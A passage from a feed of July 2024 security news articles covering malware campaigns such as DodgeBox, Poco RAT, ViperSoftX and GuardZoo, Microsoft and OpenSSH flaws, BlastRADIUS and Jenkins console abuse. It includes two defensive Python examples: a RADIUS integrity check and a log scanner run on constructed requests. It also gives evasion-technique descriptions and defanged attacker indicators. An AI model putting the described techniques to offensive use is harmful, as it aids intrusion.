called StealthVector to deliver a previously undocumented backdoor dubbed
MoonWalk.
The new variant of StealthVector – which is also referred to as DUSTPAN – has been codenamed DodgeBox by Zscaler ThreatLabz, which discovered the loader strain in April 2024.
"DodgeBox is a loader that proceeds to load a new backdoor named MoonWalk," security researchers Yin Hong Chang and Sudeep Singh said. "MoonWalk shares many evasion techniques implemented in DodgeBox and utilizes Google Drive for command-and-control (C2) communication."
APT41 is the moniker assigned to a prolific state-sponsored threat actor affiliated with China that has been active since at least 2007. It's also tracked by the broader cybersecurity community under the names Axiom, Blackfly, Brass Typhoon (formerly Barium), Bronze Atlas, Earth Baku, HOODOO, Red Kelpie, TA415, Wicked Panda, and Winnti.
In September 2020, the U.S. Department of Justice (DoJ) announced the indictment
of several threat actors associated with the hacking crew for orchestrating
intrusion campaigns targeting more than 100 companies across the world.
"The intrusions [...] facilitated the theft of source code, software code signing certificates, customer account data, and valuable business information," the DoJ said at the time, adding they also enabled "other criminal schemes, including ransomware and 'crypto-jacking' schemes."
Over the past few years, the threat group has been linked to breaches of U.S. state government networks between May 2021 and February 2022, in addition to attacks targeting Taiwanese media organizations using an open-source red teaming tool known as Google Command and Control (GC2).
The use of StealthVector by APT41 was first documented by Trend Micro in August
2021, describing it as a shellcode loader written in C/C++ that's used to
deliver Cobalt Strike Beacon and a shellcode implant named ScrambleCross (aka
SideWalk).
DodgeBox is assessed to be an improved version of StealthVector, while also incorporating various techniques like call stack spoofing, DLL side-loading, and DLL hollowing to evade detection. The exact method by which the malware is distributed is presently unknown.
"APT41 employs DLL side-loading as a means of executing DodgeBox," the
researchers said. "They utilize a legitimate executable (taskhost.exe), signed
by Sandboxie, to sideload a malicious DLL (sbiedll.dll)."
The rogue DLL (i.e., DodgeBox) is a DLL loader written in C that acts as a
conduit to decrypt and launch a second-stage payload, the MoonWalk backdoor.
The attribution of DodgeBox to APT41 stems from the similarities between DodgeBox and StealthVector; the use of DLL side-loading, a technique widely used by China-nexus groups to deliver malware such as PlugX; and the fact that DodgeBox samples have been submitted to VirusTotal from Thailand and Taiwan.
"DodgeBox is a newly identified malware loader that employs multiple techniques to evade both static and behavioral detection," the researchers said.
"It offers various capabilities, including decrypting and loading embedded DLLs, conducting environment checks and bindings, and executing cleanup procedures."
New Poco RAT Targets Spanish-Speaking Victims in Phishing Campaign
11.7.24
Virus
The Hacker News
Spanish-speaking victims have been the target of an email phishing campaign that delivers a new remote access trojan (RAT) called Poco RAT and has been active since at least February 2024.
The attacks primarily single out mining, manufacturing, hospitality, and utilities sectors, according to cybersecurity company Cofense.
"The majority of the custom code in the malware appears to be focused on anti-analysis, communicating with its command-and-control center (C2), and downloading and running files with a limited focus on monitoring or harvesting credentials," it said.
Infection chains begin with phishing messages bearing finance-themed lures that trick recipients into clicking on an embedded URL pointing to a 7-Zip archive file hosted on Google Drive.
Other methods observed include the use of HTML or PDF files directly attached to
the emails or downloaded via another embedded Google Drive link. The abuse of
legitimate services by threat actors is not a new phenomenon as it allows them
to bypass secure email gateways (SEGs).
The HTML files propagating Poco RAT, in turn, contain a link that, upon
clicking, leads to the download of the archive containing the malware
executable.
"This tactic would likely be more effective than simply providing a URL to directly download the malware as any SEGs that would explore the embedded URL would only download and check the HTML file, which would appear to be legitimate," Cofense noted.
The PDF files are no different in that they also contain a Google Drive link that harbors Poco RAT.
Once launched, the Delphi-based malware establishes persistence on the compromised Windows host and contacts a C2 server in order to deliver additional payloads. It's so named owing to its use of the POCO C++ Libraries.
The use of Delphi is a sign that the unidentified threat actors behind the campaign are focusing on Latin America, which is known to be targeted by banking trojans written in the programming language.
This connection is strengthened by the fact that the C2 server does not respond
to requests originating from infected computers that are not geolocated to the
region.
The development comes as malware authors are increasingly using QR codes embedded in PDF files to trick users into visiting phishing pages designed to harvest Microsoft 365 login credentials.
It also follows social engineering campaigns that use deceptive sites
advertising popular software to deliver malware such as RATs and information
stealers like AsyncRAT and RisePro.
Similar data theft attacks have also targeted internet users in India with bogus SMS messages falsely claiming package delivery failures and instructing them to click on a provided link to update their details.
The SMS phishing campaign has been attributed to a Chinese-speaking threat actor called Smishing Triad, which has a history of using compromised or purposefully registered Apple iCloud accounts (e.g., "fredyma514@hlh-web.de") to send smishing messages for carrying out financial fraud.
"The actors registered domain names impersonating the India Post around June, but were not actively using them, likely preparing for a large-scale activity, which became visible by July," Resecurity said. "The goal of this campaign is to steal massive amounts of personal identifiable information (PII) and payment data."
Microsoft's July Update Patches 143 Flaws, Including Two Actively Exploited
10.7.24
OS
The Hacker News
Microsoft has released patches to address a total of 143 security flaws as part
of its monthly security updates, two of which have come under active
exploitation in the wild.
Five out of the 143 flaws are rated Critical, 136 are rated Important, and four are rated Moderate in severity. The fixes are in addition to 33 vulnerabilities that have been addressed in the Chromium-based Edge browser over the past month.
The two security shortcomings that have come under exploitation are below -
CVE-2024-38080 (CVSS score: 7.8) - Windows Hyper-V
Elevation of Privilege Vulnerability
CVE-2024-38112 (CVSS score: 7.5) - Windows MSHTML Platform Spoofing
Vulnerability
"Successful exploitation of this vulnerability requires an attacker to take
additional actions prior to exploitation to prepare the target environment,"
Microsoft said of CVE-2024-38112. "An attacker would have to send the victim a
malicious file that the victim would have to execute."
Check Point security researcher Haifei Li, who has been credited with discovering and reporting the flaw in May 2024, said that threat actors are leveraging specially crafted Windows Internet Shortcut files (.URL) that, upon clicking, redirect victims to a malicious URL by invoking the retired Internet Explorer (IE) browser.
"An additional trick on IE is used to hide the malicious .HTA extension name,"
Li explained. "By opening the URL with IE instead of the modern and much more
secure Chrome/Edge browser on Windows, the attacker gained significant
advantages in exploiting the victim's computer, although the computer is running
the modern Windows 10/11 operating system."
"CVE-2024-38080 is an elevation of privilege flaw in Windows Hyper-V," Satnam Narang, senior staff research engineer at Tenable, said. "A local, authenticated attacker could exploit this vulnerability to elevate privileges to SYSTEM level following an initial compromise of a targeted system."
While the exact specifics surrounding the abuse of CVE-2024-38080 are currently unknown, Narang noted that this is the first of the 44 Hyper-V flaws to come under exploitation in the wild since 2022.
Two other security flaws patched by Microsoft have been listed as publicly known at the time of the release. This includes a side-channel attack called FetchBench (CVE-2024-37985, CVSS score: 5.9) that could enable an adversary to view heap memory from a privileged process running on Arm-based systems.
The second publicly disclosed vulnerability in question is CVE-2024-35264 (CVSS score: 8.1), a remote code execution bug impacting .NET and Visual Studio.
"An attacker could exploit this by closing an http/3 stream while the request body is being processed leading to a race condition," Redmond said in an advisory. "This could result in remote code execution."
Also resolved as part of Patch Tuesday updates are 37 remote code execution flaws affecting the SQL Server Native Client OLE DB Provider, 20 Secure Boot security feature bypass vulnerabilities, three PowerShell privilege escalation bugs, and a spoofing vulnerability in the RADIUS protocol (CVE-2024-3596 aka BlastRADIUS).
"[The SQL Server flaws] specifically affect the OLE DB Provider, so not only do SQL Server instances need to be updated, but client code running vulnerable versions of the connection driver will also need to be addressed," Rapid7's Lead Product Manager Greg Wiseman said.
"For example, an attacker could use social engineering tactics to dupe an authenticated user into attempting to connect to a SQL Server database configured to return malicious data, allowing arbitrary code execution on the client."
Rounding off the long list of patches is CVE-2024-38021 (CVSS score: 8.8), a remote code execution flaw in Microsoft Office that, if successfully exploited, could permit an attacker to gain high privileges, including read, write, and delete functionality.
Morphisec, which reported the flaw to Microsoft in late April 2024, said the vulnerability does not require any authentication and poses a severe risk due to its zero-click nature.
"Attackers could exploit this vulnerability to gain unauthorized access, execute
arbitrary code, and cause substantial damage without any user interaction,"
Michael Gorelik said. "The absence of authentication requirements makes it
particularly dangerous, as it opens the door to widespread exploitation."
The fixes come as Microsoft announced late last month that it will begin issuing
CVE identifiers for cloud-related security vulnerabilities going forward in an
attempt to improve transparency.
Google Adds Passkeys to Advanced Protection Program for High-Risk Users
10.7.24
Safety
The Hacker News
Google on Wednesday announced that it's making available passkeys for high-risk
users to enroll in its Advanced Protection Program (APP).
"Users traditionally needed a physical security key for APP — now they can choose a passkey to secure their account," Shuvo Chatterjee, product lead of APP, said.
Passkeys are considered a more secure and
phishing-resistant alternative to passwords. Based on the FIDO Authentication
standard, the technology is designed to secure online accounts against potential
takeover attacks by ditching passwords in favor of biometrics or a PIN.
Passkeys can simultaneously act as a first and second factor, entirely obviating the need for a password. Earlier this May, the tech giant revealed that passkeys are being used by over 400 million Google accounts.
High-risk users, who face elevated exposure to cyber attacks because of who they are and what they do (e.g., journalists, elected officials, political campaign staff, human rights workers, and business leaders), can check if they have a compatible device and browser and complete the enrollment process.
"We also require you to add recovery options during enrollment (e.g. a phone number and email, or another passkey or security key), a combination of which will help you regain access to your account if you get locked out," Chatterjee said.
Google further said it's partnering with Internews to
provide journalists and human rights workers with security support. The program
spans 10 countries, including Brazil, Mexico, and Poland.
The development comes as Google said it intends to expand dark web reports to
any user with a Google account starting later this month to check if their
information has been leaked on the darknet. The feature was previously limited
to Google One subscribers.
"Dark web report will become available to all users with a consumer Google Account," it noted in a support document. "Dark web report is integrated with Results about you as a combined solution to help users protect their online presence."
HuiOne Guarantee: The $11 Billion Cybercrime Hub of Southeast Asia
10.7.24
Cryptocurrency
The Hacker News
Cryptocurrency analysts have shed light on an online marketplace called HuiOne
Guarantee that's widely used by cybercriminals in Southeast Asia, particularly
those linked to pig butchering scams.
"Merchants on the platform offer technology, data, and money laundering services, and have engaged in transactions totaling at least $11 billion," Elliptic said in a report shared with The Hacker News.
The British blockchain analytics firm said that the
marketplace is part of HuiOne Group, a Cambodian conglomerate with links to
Cambodia's ruling Hun family and that another HuiOne business, HuiOne
International Payments, is actively involved in laundering scam proceeds
globally.
According to its website, HuiOne's financial services arm is said to have
500,000 registered users. It also touts Alipay, Huawei, PayGo Wallet, UnionPay,
and Yes Seatel as its customers.
Southeast Asian countries like Burma, Cambodia, Laos, Malaysia, Myanmar, and the Philippines have become a breeding ground for pig butchering scams in recent years.
In these schemes, unwitting people from Asia and Africa are enticed with
high-paying jobs in the region, only for them to be trapped inside "scam
compounds" run by transnational organized crime groups originating from China
and coerced into participating in fraudulent activities.
These entail creating fake accounts on social media and dating platforms, and using them to develop romantic relationships with victims and eventually persuade them to invest in non-existent crypto businesses with an aim to siphon their funds.
HuiOne Guarantee, established in 2021, comprises a network of thousands of instant messaging app channels on Telegram that are run by different merchants. While it claims to serve as a marketplace for real estate and cars, Elliptic said that a majority of the goods and services offered are aimed at cyber scam operators.
"The largest category of merchants operating on HuiOne Guarantee are those
offering to move and exchange money," the company explained.
"Many of the merchants explicitly offer money laundering services, including
accepting payments from victims around the world, transferring it across borders
and converting it to other assets including cash, stablecoins, and to Chinese
payment apps."
Merchants have also been found advertising software and web development services that facilitate the creation of scam crypto investment websites used in pig butchering scams, as well as marketing tear gas, electric batons and electronic shackles for use by scam compound operators to imprison and torture their workers.
According to data shared by SlowMist earlier this January, merchants associated with HuiOne Guarantee – which is also referred to as Huiwang Guarantee – are said to have further engaged in cryptocurrency transactions with a wallet that received more than 4.6 million USDT from another wallet linked to the Myanmar Alliance Army.
"The value of cryptocurrency received by HuiOne Guarantee and its merchants, and the type of goods and services offered, suggest that it is a key enabler of cyber scam operators in Southeast Asia," Elliptic said.
ViperSoftX Malware Disguises as
eBooks on Torrents to Spread Stealthy Attacks
10.7.24
Virus
The Hacker News
The sophisticated malware known as ViperSoftX has been observed being
distributed as eBooks over torrents.
"A notable aspect of the current variant of ViperSoftX is that it uses the Common Language Runtime (CLR) to dynamically load and run PowerShell commands, thereby creating a PowerShell environment within AutoIt for operations," Trellix security researchers Mathanraj Thangaraju and Sijo Jacob said.
"By utilizing CLR, ViperSoftX can seamlessly integrate PowerShell functionality,
allowing it to execute malicious functions while evading detection mechanisms
that might otherwise flag standalone PowerShell activity."
Initially detected by Fortinet in 2020, ViperSoftX is known for its ability to
exfiltrate sensitive information from compromised Windows hosts. Over the years,
the malware has become a relevant example of threat actors continuously
innovating their tactics in an attempt to stay stealthy and circumvent defenses.
This is exemplified by the increased complexity and the adoption of advanced anti-analysis techniques such as byte remapping and web browser communication blocking, as documented by Trend Micro in April 2023.
As recently as May 2024, malicious campaigns have leveraged ViperSoftX as a delivery vehicle to distribute Quasar RAT and another information stealer named TesseractStealer.
Attack chains propagating the malware are known to employ cracked software and torrent sites, but the use of eBook lures is a newly observed approach. Present within the supposed eBook RAR archive file is a hidden folder as well as a deceptive Windows shortcut file that purports to be a benign document.
Executing the shortcut file initiates a multi-stage infection sequence: it first extracts PowerShell code that unhides the concealed folder and sets up persistence on the system to launch an AutoIt script; that script, in turn, interacts with the .NET CLR framework to decrypt and run a secondary PowerShell script, which is ViperSoftX itself.
"AutoIt does not by default support the .NET Common Language Runtime (CLR)," the
researchers said. "However, the language's user-defined functions (UDF) offer a
gateway to the CLR library, granting malevolent actors access to PowerShell's
formidable capabilities."
ViperSoftX harvests system information, scans for cryptocurrency wallets via
browser extensions, captures clipboard contents, and dynamically downloads and
runs additional payloads and commands based on responses received from a remote
server. It also comes with self-deletion mechanisms to challenge detection.
"One of the hallmark features of ViperSoftX is its adept use of the Common Language Runtime (CLR) to orchestrate PowerShell operations within the AutoIt environment," the researchers said. "This integration enables seamless execution of malicious functions while evading detection mechanisms that would typically flag standalone PowerShell activity."
"Furthermore, ViperSoftX's ability to patch the Antimalware Scan Interface (AMSI) before executing PowerShell scripts underscores its determination to circumvent traditional security measures."
New OpenSSH Vulnerability
Discovered: Potential Remote Code Execution Risk
10.7.24
Vulnerability
The Hacker News
Select versions of the OpenSSH secure networking suite are susceptible to a new
vulnerability that can trigger remote code execution (RCE).
The vulnerability, tracked as CVE-2024-6409 (CVSS score: 7.0), is distinct from CVE-2024-6387 (aka RegreSSHion) and relates to a case of code execution in the privsep child process due to a race condition in signal handling. It only impacts versions 8.7p1 and 8.8p1 shipped with Red Hat Enterprise Linux 9.
Security researcher Alexander Peslyak, who goes by the alias Solar Designer, has been credited with discovering and reporting the bug, which was found during a review of CVE-2024-6387 after the latter was disclosed by Qualys earlier this month.
"The main difference from CVE-2024-6387 is that the race condition and RCE potential are triggered in the privsep child process, which runs with reduced privileges compared to the parent server process," Peslyak said.
"So the immediate impact is lower. However, there may be differences in exploitability of these vulnerabilities in a particular scenario, which could make either one of these a more attractive choice for an attacker, and if only one of these is fixed or mitigated then the other becomes more relevant."
However, it's worth noting that the signal handler race condition vulnerability is the same as CVE-2024-6387, wherein if a client does not authenticate within LoginGraceTime seconds (120 by default), then the OpenSSH daemon process' SIGALRM handler is called asynchronously, which then invokes various functions that are not async-signal-safe.
"This issue leaves it vulnerable to a signal handler race condition on the cleanup_exit() function, which introduces the same vulnerability as CVE-2024-6387 in the unprivileged child of the SSHD server," according to the vulnerability description.
"As a consequence of a successful attack, in the worst case scenario, the attacker may be able to perform a remote code execution (RCE) within unprivileged user running the sshd server."
An active exploit for CVE-2024-6387 has since been detected in the wild, with an unknown threat actor targeting servers primarily located in China.
"The initial vector of this attack originates from the IP address 108.174.58[.]28, which was reported to host a directory listing exploit tools and scripts for automating the exploitation of vulnerable SSH servers," Israeli cybersecurity company Veriti said.
RADIUS Protocol Vulnerability
Exposes Networks to MitM Attacks
9.7.24
Attack
The Hacker News
Cybersecurity researchers have discovered a security vulnerability in the RADIUS
network authentication protocol called BlastRADIUS that could be exploited by an
attacker to stage Mallory-in-the-middle (MitM) attacks and bypass integrity
checks under certain circumstances.
"The RADIUS protocol allows certain Access-Request messages to have no integrity or authentication checks," InkBridge Networks CEO Alan DeKok, who is the creator of the FreeRADIUS Project, said in a statement.
"As a result, an attacker can modify these packets without detection. The attacker would be able to force any user to authenticate, and to give any authorization (VLAN, etc.) to that user."
RADIUS, short for Remote Authentication Dial-In User Service, is a client/server protocol that provides centralized authentication, authorization, and accounting (AAA) management for users who connect and use a network service.
The security of RADIUS is reliant on a hash that's derived using the MD5 algorithm, which has been deemed cryptographically broken as of December 2008 owing to the risk of collision attacks.
This means that Access-Request packets can be subjected to what's called a chosen-prefix collision attack, which makes it possible to modify the response packet such that it passes all of the integrity checks for the original response.
However, for the attack to succeed, the adversary has to be able to modify
RADIUS packets in transit between the RADIUS client and server. This also means
that organizations that send packets over the internet are at risk of the flaw.
Other mitigating factors that blunt the attack are the use of TLS to carry
RADIUS traffic over the internet and the additional per-packet integrity
protection provided by the Message-Authenticator attribute.
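As an added example (not InkBridge's or FreeRADIUS's code), the following Python builds an Access-Request carrying a Message-Authenticator attribute (HMAC-MD5 keyed with the shared secret, computed over the packet with the attribute's value zeroed, per RFC 2869) and shows the server-side check a hardened deployment enforces: reject any Access-Request whose Message-Authenticator is missing or does not verify. The shared secret, user name and request authenticator bytes are constructed values.

```python
"""Build and verify the RADIUS Message-Authenticator attribute (RFC 2869, 5.14)."""
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST = 1
ATTR_USER_NAME = 1
ATTR_MESSAGE_AUTHENTICATOR = 80
HEADER_LEN = 20   # code(1) + identifier(1) + length(2) + authenticator(16)
MAC_LEN = 16      # HMAC-MD5 output size


def encode_attr(attr_type: int, value: bytes) -> bytes:
    """Encode one attribute as Type, Length (including the 2-byte header), Value."""
    if len(value) > 253:
        raise ValueError("attribute value too long")
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def build_packet(code: int, identifier: int, authenticator: bytes, attrs: bytes) -> bytes:
    if len(authenticator) != 16:
        raise ValueError("authenticator must be 16 bytes")
    return struct.pack("!BBH", code, identifier, HEADER_LEN + len(attrs)) + authenticator + attrs


def find_message_authenticator(packet: bytes):
    """Offset of the Message-Authenticator value, or None if absent, duplicated or malformed."""
    off, found = HEADER_LEN, None
    while off < len(packet):
        if off + 2 > len(packet):
            return None
        attr_type, length = struct.unpack_from("!BB", packet, off)
        if length < 2 or off + length > len(packet):
            return None                       # truncated or malformed TLV
        if attr_type == ATTR_MESSAGE_AUTHENTICATOR:
            if length != 2 + MAC_LEN or found is not None:
                return None                   # wrong size or a second copy
            found = off + 2
        off += length
    return found


def build_access_request(secret: bytes, identifier: int, username: str,
                         authenticator: bytes = None) -> bytes:
    authenticator = authenticator or os.urandom(16)
    attrs = encode_attr(ATTR_USER_NAME, username.encode())
    # The HMAC covers the whole packet with the Message-Authenticator value set to zeros.
    zeroed = build_packet(ACCESS_REQUEST, identifier, authenticator,
                          attrs + encode_attr(ATTR_MESSAGE_AUTHENTICATOR, bytes(MAC_LEN)))
    mac = hmac.new(secret, zeroed, hashlib.md5).digest()
    return build_packet(ACCESS_REQUEST, identifier, authenticator,
                        attrs + encode_attr(ATTR_MESSAGE_AUTHENTICATOR, mac))


def verify_message_authenticator(secret: bytes, packet: bytes) -> bool:
    """True only if a well-formed Message-Authenticator is present and verifies."""
    if len(packet) < HEADER_LEN:
        return False
    _, _, length = struct.unpack_from("!BBH", packet)
    if length != len(packet):
        return False
    pos = find_message_authenticator(packet)
    if pos is None:
        return False
    zeroed = packet[:pos] + bytes(MAC_LEN) + packet[pos + MAC_LEN:]
    expected = hmac.new(secret, zeroed, hashlib.md5).digest()
    return hmac.compare_digest(expected, packet[pos:pos + MAC_LEN])


def accept_access_request(secret: bytes, packet: bytes,
                          require_message_authenticator: bool = True):
    """Server-side policy decision: returns (accepted, reason)."""
    if len(packet) < HEADER_LEN or packet[0] != ACCESS_REQUEST:
        return False, "not an Access-Request"
    if find_message_authenticator(packet) is None:
        if require_message_authenticator:
            return False, "Message-Authenticator missing (required by policy)"
        return True, "accepted without integrity check (legacy mode, open to forgery)"
    if not verify_message_authenticator(secret, packet):
        return False, "Message-Authenticator invalid: packet modified or wrong shared secret"
    return True, "Message-Authenticator valid"


if __name__ == "__main__":
    secret = b"constructed-shared-secret"           # constructed, not a real deployment value
    pkt = build_access_request(secret, 7, "alice")
    print(accept_access_request(secret, pkt))
    bare = build_packet(ACCESS_REQUEST, 7, bytes(16), encode_attr(ATTR_USER_NAME, b"alice"))
    print(accept_access_request(secret, bare))
```

The keyed HMAC is what the chosen-prefix collision cannot forge, which is why requiring the attribute on every Access-Request (and not merely accepting it when present) closes the gap for PAP, CHAP and MS-CHAPv2 requests; the check is only as strong as the shared secret, and a client that never sends the attribute will be rejected by a server running this policy, so client upgrades have to precede the server-side switch.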
BlastRADIUS is the result of a fundamental design flaw and is said to impact all standards-compliant RADIUS clients and servers, making it imperative that internet service providers (ISPs) and organizations that use the protocol update to the latest version.
"Specifically, PAP, CHAP, and MS-CHAPv2 authentication methods are the most vulnerable," DeKok said. "ISPs will have to upgrade their RADIUS servers and networking equipment."
"Anyone using MAC address authentication, or RADIUS for administrator logins to switches is vulnerable. Using TLS or IPSec prevents the attack, and 802.1X (EAP) is not vulnerable."
For enterprises, the attacker would already need to have access to the management virtual local area network (VLAN). What's more, ISPs can be susceptible if they send RADIUS traffic over intermediate networks, such as third-party outsourcers, or the wider internet.
It's worth noting that the vulnerability, which carries a CVSS score of 9.0, particularly affects networks that send RADIUS/UDP traffic over the internet given that "most RADIUS traffic is sent 'in the clear.'" There is no evidence that it's being exploited in the wild.
"This attack is the result of the security of the RADIUS protocol being neglected for a very long time," DeKok said.
"While the standards have long suggested protections which would have prevented the attack, those protections were not made mandatory. In addition, many vendors did not even implement the suggested protections."
Hackers Exploiting Jenkins Script
Console for Cryptocurrency Mining Attacks
9.7.24
Cryptocurrency
The Hacker News
Cybersecurity researchers have found that it's possible for attackers to
weaponize improperly configured Jenkins Script Console instances to further
criminal activities such as cryptocurrency mining.
"Misconfigurations such as improperly set up authentication mechanisms expose the '/script' endpoint to attackers," Trend Micro's Shubham Singh and Sunil Bharti said in a technical write-up published last week. "This can lead to remote code execution (RCE) and misuse by malicious actors."
Jenkins, a popular continuous integration and continuous delivery (CI/CD) platform, features a Groovy script console that allows users to run arbitrary Groovy scripts within the Jenkins controller runtime.
The project maintainers, in the official documentation, explicitly note that the web-based Groovy shell can be used to read files containing sensitive data (e.g., "/etc/passwd"), decrypt credentials configured within Jenkins, and even reconfigure security settings.
The console "offers no administrative controls to stop a user (or admin) once they are able to execute the Script Console from affecting all parts of the Jenkins infrastructure," reads the documentation. "Granting a normal Jenkins user Script Console Access is essentially the same as giving them Administrator rights within Jenkins."
While access to Script Console is typically limited only to authenticated users with administrative permissions, misconfigured Jenkins instances could inadvertently make the "/script" (or "/scriptText") endpoint accessible over the internet, making it ripe for exploitation by attackers looking to run dangerous commands.
Trend Micro said it found instances of threat actors exploiting the Jenkins Groovy plugin misconfiguration to execute a Base64-encoded string containing a malicious script that's designed to mine cryptocurrency on the compromised server by deploying a miner payload hosted on berrystore[.]me and setting up persistence.
"The script ensures it has enough system resources to perform the mining effectively," the researchers said. "To do this, the script checks for processes that consume more than 90% of the CPU's resources, then proceeds to kill these processes. Furthermore, it will terminate all stopped processes."
To safeguard against such exploitation attempts, it's advised to ensure proper configuration, implement robust authentication and authorization, conduct regular audits, and restrict Jenkins servers from being publicly exposed on the internet.
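To support the regular audits recommended above, here is an added Python example (not Trend Micro's or the Jenkins project's code) that scans an access log for Script Console requests and grades them: an anonymous request that received a 2xx from /script or /scriptText is exactly the exposure the write-up describes. It assumes the log is in NCSA combined format; the log lines, addresses and trusted network ranges are constructed.

```python
"""Grade Jenkins Script Console requests found in an NCSA 'combined' access log."""
import ipaddress
import re

# Constructed sample lines (not real traffic); combined format is
# client ident authuser [time] "request" status bytes "referer" "user-agent"
SAMPLE_LOG = """\
203.0.113.7 - - [09/Jul/2024:10:15:01 +0000] "POST /script HTTP/1.1" 200 5123 "-" "curl/8.4.0"
10.0.0.5 - admin [09/Jul/2024:10:16:44 +0000] "GET /script HTTP/1.1" 200 9001 "https://jenkins.example.internal/manage" "Mozilla/5.0"
198.51.100.23 - - [09/Jul/2024:10:17:02 +0000] "POST /scriptText HTTP/1.1" 403 311 "-" "python-requests/2.31"
10.0.0.8 - bob [09/Jul/2024:10:18:10 +0000] "GET /job/build/1/console HTTP/1.1" 200 4311 "-" "Mozilla/5.0"
10.0.0.9 - carol [09/Jul/2024:10:19:30 +0000] "POST /computer/agent-1/script HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"$'
)

# Assumed trusted management ranges (constructed); adjust to the real admin network.
DEFAULT_TRUSTED = ("10.0.0.0/8", "127.0.0.0/8", "::1/128")


def is_console_request(path: str) -> bool:
    """Match /script and /scriptText by last path segment so that a context-path
    prefix (/jenkins/script) and the per-agent /computer/<name>/script console
    are covered as well."""
    base = path.split("?", 1)[0].rstrip("/")
    return base.rsplit("/", 1)[-1] in ("script", "scriptText")


def classify(line, trusted_nets):
    """Return a finding dict for a console request, or None for other lines."""
    m = LINE_RE.match(line)
    if not m or not is_console_request(m["path"]):
        return None
    client = ipaddress.ip_address(m["client"])
    trusted = any(client in net for net in trusted_nets)
    status = int(m["status"])
    anonymous = m["user"] == "-"
    served = 200 <= status < 300
    if served and anonymous:
        severity = "critical"   # console served without authentication: the misconfiguration itself
    elif served and not trusted:
        severity = "high"       # authenticated, but from outside the management network
    elif served:
        severity = "info"       # admin use from a trusted address; keep for the audit trail
    else:
        severity = "medium"     # denied, but someone is probing the endpoint
    return {"severity": severity, "client": str(client), "user": m["user"],
            "method": m["method"], "path": m["path"], "status": status,
            "agent": m["agent"]}


def scan(log_text, trusted_nets=DEFAULT_TRUSTED):
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    findings = []
    for line in log_text.splitlines():
        finding = classify(line, nets)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']:8}] {f['client']:>15} user={f['user']} "
              f"{f['method']} {f['path']} -> {f['status']} ({f['agent']})")
```

A single "critical" hit means the authorization strategy is letting anonymous users reach the console and should be treated as a confirmed compromise of the controller, not just a misconfiguration; "medium" hits from the internet show the endpoint is reachable at the network layer even when authentication held, which is the exposure the last recommendation above is about.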
The development comes as cryptocurrency thefts arising from hacks and exploits have surged in the first half of 2024, allowing threat actors to plunder $1.38 billion, up from $657 million year-over-year.
"The top five hacks and exploits accounted for 70% of the total amount stolen so far this year," blockchain intelligence platform TRM Labs said. "Private key and seed phrase compromises remain a top attack vector in 2024, alongside smart contract exploits and flash loan attacks."
GuardZoo Malware Targets Over 450
Middle Eastern Military Personnel
9.7.24
Virus
The Hacker News
Military personnel from Middle East countries are the target of an ongoing surveillanceware operation that delivers an Android data-gathering tool called GuardZoo.
The campaign, believed to have commenced as early as October 2019, has been
attributed to a Houthi-aligned threat actor based on the application lures,
command-and-control (C2) server logs, targeting footprint, and the attack
infrastructure location, according to Lookout.
More than 450 victims have been impacted by the malicious activity, with targets
located in Egypt, Oman, Qatar, Saudi Arabia, Turkey, the U.A.E., and Yemen.
Telemetry data indicates that most of the infections have been recorded in
Yemen.
GuardZoo is a modified version of an Android remote access trojan (RAT) named
Dendroid RAT that was first discovered by Broadcom-owned Symantec in March 2014.
The entire source code associated with the crimeware solution was leaked later
that August.
Originally marketed as commodity malware for a one-off price of $300, it comes with capabilities to call a phone number, delete call logs, open web pages, record audio and calls, access SMS messages, take and upload photos and videos, and even initiate an HTTP flood attack.
"However, many changes were made to the code base in order to add new
functionalities and remove unused functions," Lookout researchers Alemdar
Islamoglu and Kyle Schmittle said in a report shared with The Hacker News.
"GuardZoo doesn't use the leaked PHP web panel from Dendroid RAT for Command and
Control (C2) but instead uses a new C2 backend created with ASP.NET."
Attack chains distributing GuardZoo leverage WhatsApp and WhatsApp Business as
distribution vectors, with the initial infections also taking place via direct
browser downloads. The booby-trapped Android apps bear military and religious
themes to entice users into downloading them.
The updated version of the malware supports more than 60 commands that allow it to fetch additional payloads, download files and APKs, upload files (PDF, DOC, DOCX, XLX, XLSX, and PPT), and images, change C2 address, and terminate, update, or delete itself from the compromised device.
"GuardZoo has been using the same dynamic DNS domains for C2 operations since October 2019," the researchers said. "These domains resolve to IP addresses registered to YemenNet and they change regularly."
Cybersecurity Agencies Warn of
China-linked APT40's Rapid Exploit Adaptation
9.7.24
APT
The Hacker News
Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand,
South Korea, the U.K., and the U.S. have released a joint advisory about a
China-linked cyber espionage group called APT40, warning about its ability to
co-opt exploits for newly disclosed security flaws within hours or days of
public release.
"APT40 has previously targeted organizations in various countries, including Australia and the United States," the agencies said. "Notably, APT40 possesses the ability to quickly transform and adapt vulnerability proofs-of-concept (PoCs) for targeting, reconnaissance, and exploitation operations."
The adversarial collective, also known as Bronze Mohawk, Gingham Typhoon
(formerly Gadolinium), ISLANDDREAMS, Kryptonite Panda, Leviathan, Red Ladon,
TA423, and TEMP.Periscope, is known to be active since at least 2013, carrying
out cyber attacks targeting entities in the Asia-Pacific region. It's assessed
to be based in Haikou.
In July 2021, the U.S. and its allies officially attributed the group as
affiliated with China's Ministry of State Security (MSS), indicting several
members of the hacking crew for orchestrating a multiyear campaign aimed at
different sectors to facilitate the theft of trade secrets, intellectual
property, and high-value information.
Over the past few years, APT40 has been linked to intrusion waves delivering the ScanBox reconnaissance framework as well as the exploitation of a security flaw in WinRAR (CVE-2023-38831, CVSS score: 7.8) as part of a phishing campaign targeting Papua New Guinea to deliver a backdoor dubbed BOXRAT.
Then earlier this March, the New Zealand government implicated the threat actor in the 2021 compromise of the Parliamentary Counsel Office and the Parliamentary Service.
"APT40 identifies new exploits within widely used public software such as Log4j,
Atlassian Confluence, and Microsoft Exchange to target the infrastructure of the
associated vulnerability," the authoring agencies said.
"APT40 regularly conducts reconnaissance against networks of interest, including networks in the authoring agencies' countries, looking for opportunities to compromise its targets. This regular reconnaissance postures the group to identify vulnerable, end-of-life or no longer maintained devices on networks of interest, and to rapidly deploy exploits."
